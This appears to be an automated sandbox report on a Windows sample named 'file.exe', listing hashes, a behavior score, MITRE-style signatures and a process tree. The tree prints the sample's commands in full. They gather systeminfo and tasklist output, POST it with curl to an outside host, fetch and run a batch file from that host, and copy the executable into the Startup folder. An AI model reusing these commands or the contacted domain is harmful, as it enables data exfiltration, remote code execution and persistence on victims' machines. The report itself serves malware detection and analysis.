Overview

overview

7

Static

static

5

file.exe

windows7-x64

3

file.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    93s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-12-2024 15:45

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    file.exe

  • Size

    898KB

  • MD5

    5950611ed70f90b758610609e2aee8e6

  • SHA1

    798588341c108850c79da309be33495faf2f3246

  • SHA256

    5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4

  • SHA512

    7e51c458a9a2440c778361eb19f0c13ea4de75b2cf54a5828f6230419fbf52c4702be4f0784e7984367d67fabf038018e264e030e4a4c7dac7ba93e5c1395b80

  • SSDEEP

    12288:UqDEvFo+yo4DdbbMWu/jrQu4M9lBAlKhQcDGB3cuBNGE6iOrpfe4JdaDgapT1:UqDEvCTbMWu7rQYlBQcBiT6rprG8at1

Score
7/10
discovery

Malware Config

Signatures

  • Drops startup file 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
    discovery
  • System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4988
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:440
      • C:\Windows\SysWOW64\systeminfo.exe
        systeminfo
        3⤵
        • System Location Discovery: System Language Discovery
        • Gathers system information
        PID:5104
      • C:\Windows\SysWOW64\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:3716
    • C:\Windows\SysWOW64\curl.exe
      curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C66696C652E657865" -X POST -H "X-Auth: 2F47594841534F4C532F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:760
    • C:\Windows\SysWOW64\curl.exe
      curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C66696C652E657865" -H "X-Auth: 2F47594841534F4C532F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:948
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c type "C:\Users\Admin\AppData\Local\Temp\file.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"
      2⤵
      • Drops startup file
      • System Location Discovery: System Language Discovery
      PID:3936
    • C:\Windows\SysWOW64\curl.exe
      curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C66696C652E657865" -H "X-Auth: 2F47594841534F4C532F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:3084
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1064
    • C:\Windows\SysWOW64\curl.exe
      curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C66696C652E657865" -X POST -H "X-Auth: 2F47594841534F4C532F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:4172

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\tmp.bat
    Filesize

    2B

    MD5

    81051bcc2cf1bedf378224b0a93e2877

    SHA1

    ba8ab5a0280b953aa97435ff8946cbcbb2755a27

    SHA256

    7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6

    SHA512

    1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\tmp.ini
    Filesize

    34B

    MD5

    557464a645cbcc72fb20348e1c58dbfd

    SHA1

    2a68b1e4c9cca06c959a3174058a27da0faddadd

    SHA256

    2fb99e1172ec47d7d0a943294a483e9c695d774ad9eca0c689eb0e4ad4982c66

    SHA512

    728fba91e931258ed5ad1ff48299193384c0053770e05c0f813e8407dd328454c2c233da52ea67eb5aaf1c523a8d0e5de5a30b9bc94186e62c204b26df23123e

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\tmp.txt
    Filesize

    8KB

    MD5

    1a1c03ef781e64f6c5914f1d76b8e6c9

    SHA1

    8e72c669ed8babe032d2d19dd0858ff06ba9b6a1

    SHA256

    b1358fe6c0f024735e825d07a06af5909a091080f63f70967b30e2036a1178aa

    SHA512

    b30b5a41318b23717d3476d854258623f5d6f87a03b03c60adbb10928fa5aa87124a64c4b68c15b74e4ae4f659d0a809b88d0596de83a62e082a6cbc39d79349

    Download Submit